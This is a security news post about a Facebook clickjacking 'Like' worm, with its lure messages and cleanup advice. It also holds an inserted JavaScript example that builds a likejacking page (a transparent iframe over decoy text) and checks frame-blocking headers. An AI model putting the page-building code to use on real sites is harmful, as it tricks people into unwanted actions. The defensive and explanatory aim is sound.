Viral clickjacking 'Like' worm hits Facebook users

Filed Under: Clickjacking, Facebook, Malware, Social networks, Spam

Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook this holiday weekend.

Affected profiles can be identified by seeing that the Facebook user has apparently "liked" a link:

Girl gets owned after a police officer reads her status message

Messages seen being used by the spammers include:

"LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE."

"This man takes a picture of himself EVERYDAY for 8 YEARS!!"

"The Prom Dress That Got This Girl Suspended From School."

"This Girl Has An Interesting Way Of Eating A Banana, Check It Out!"

Clicking on the links takes Facebook users to what appears to be a blank page with just the message "Click here to continue".

However, the visible page is a decoy. A transparent iframe containing a Facebook "Like" button is layered over it, so clicking anywhere on the page actually clicks that button and publishes the same message to the victim's own Facebook page, in a similar fashion to the "Fbhole" worm we saw earlier this month.

This is a classic clickjacking exploit: visiting users are manipulated into "liking" a page without necessarily realising they are recommending it to all of their Facebook friends.
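As an added example (not code from the article, from Sophos or from Facebook; the origins attacker.example, social.example and partner.example are placeholders), here are the two halves of the technique in JavaScript: the structure of a likejacking page, and the check a site owner runs against their own response headers to see whether a page of theirs can be framed cross-origin at all.

```javascript
// Added example, not code from the article or from Facebook/Sophos.
// Two halves of the "likejacking" story: how the attacker page is built, and
// how a site owner checks whether a page of theirs can be framed at all.
// All origins and URLs are placeholders (attacker.example, social.example).

// 1. Attacker side. The victim sees only a decoy line of text; a transparent
//    iframe carrying the target site's "Like" button is stacked on top of it, so
//    a click anywhere on the decoy is delivered to the button instead.
function buildClickjackPage(targetFrameUrl, decoyText) {
  return `<!doctype html>
<html><head><style>
  #decoy { position:absolute; top:100px; left:100px; font:16px sans-serif; }
  /* Same spot as the decoy, higher z-index, zero opacity: it receives the
     click but is invisible. */
  #bait  { position:absolute; top:90px; left:90px; width:120px; height:40px;
           opacity:0; z-index:2; border:0; }
</style></head><body>
  <p id="decoy">${decoyText}</p>
  <iframe id="bait" src="${targetFrameUrl}" scrolling="no"></iframe>
</body></html>`;
}

// 2. Defender side. The framed site's fix is to refuse to be framed, via
//    CSP frame-ancestors (preferred) or X-Frame-Options. Given a page's response
//    headers, decide whether a browser would render it inside a frame served
//    from framerOrigin. The matching rules are a simplification of the CSP
//    spec: ports and paths in host-sources are ignored.
function ancestorSourceMatches(src, framerOrigin, pageOrigin) {
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === pageOrigin;
  if (src === '*') return true;
  const framer = new URL(framerOrigin);
  // scheme-source such as "https:" matches any host on that scheme
  if (/^[a-z][a-z0-9+.-]*:$/i.test(src)) return src.toLowerCase() === framer.protocol;
  // host-source: optional scheme, host, optional leading "*." wildcard label
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)/i.exec(src);
  if (!m) return false;
  const [, scheme, hostPattern] = m;
  if (scheme && scheme.toLowerCase() + ':' !== framer.protocol) return false;
  if (hostPattern.startsWith('*.')) {
    const suffix = hostPattern.slice(1).toLowerCase();       // ".partner.example"
    return framer.hostname.endsWith(suffix) && framer.hostname.length > suffix.length;
  }
  return framer.hostname === hostPattern.toLowerCase();
}

function isFramableFrom(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  // A frame-ancestors directive, when present, overrides X-Frame-Options.
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(s => s.trim())
    .find(s => /^frame-ancestors(\s|$)/i.test(s));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);        // empty list == 'none'
    return sources.some(src => ancestorSourceMatches(src, framerOrigin, pageOrigin));
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  // No header, or an unrecognised value (ALLOW-FROM is obsolete and ignored by
  // current browsers): the page can be framed by anyone.
  return true;
}

// Constructed sample headers: a vulnerable page and a hardened one.
const vulnerableHeaders = { 'Content-Type': 'text/html' };
const hardenedHeaders = {
  'Content-Type': 'text/html',
  'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example",
  'X-Frame-Options': 'SAMEORIGIN',   // fallback for browsers without CSP level 2
};

console.log(isFramableFrom(vulnerableHeaders, 'https://attacker.example', 'https://social.example')); // true
console.log(isFramableFrom(hardenedHeaders, 'https://attacker.example', 'https://social.example'));   // false
```

Run it with node. One caveat: a Like button is designed to be embedded on other sites' pages, so `frame-ancestors 'none'` is not an option for that endpoint itself; the header check above is the control for your own site's state-changing pages, which is where clickjacking defences normally go.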

Unfortunately, as we're all too aware, messages such as "LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.", "This man takes a picture of himself EVERYDAY for 8 YEARS!!", "The Prom Dress That Got This Girl Suspended From School." and "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!" are exactly the kind of content that people will click on on Facebook.

Sophos detects the offending webpages as being infected by Troj/Iframe-ET.

If you believe you may have been hit by this attack, view the recent activity on your news feed and delete entries related to the above links. Furthermore, you should view your profile, click on your Info tab and remove any of the pages from your "Likes and interests" section.

If you're a regular user of Facebook, you should join the Sophos page on Facebook to be kept informed of the latest security threats.

Update: Richard Cohen of SophosLabs has also blogged about this threat, which he nicknames "Likejacking".

About the author

Graham Cluley is an award-winning security blogger, and veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.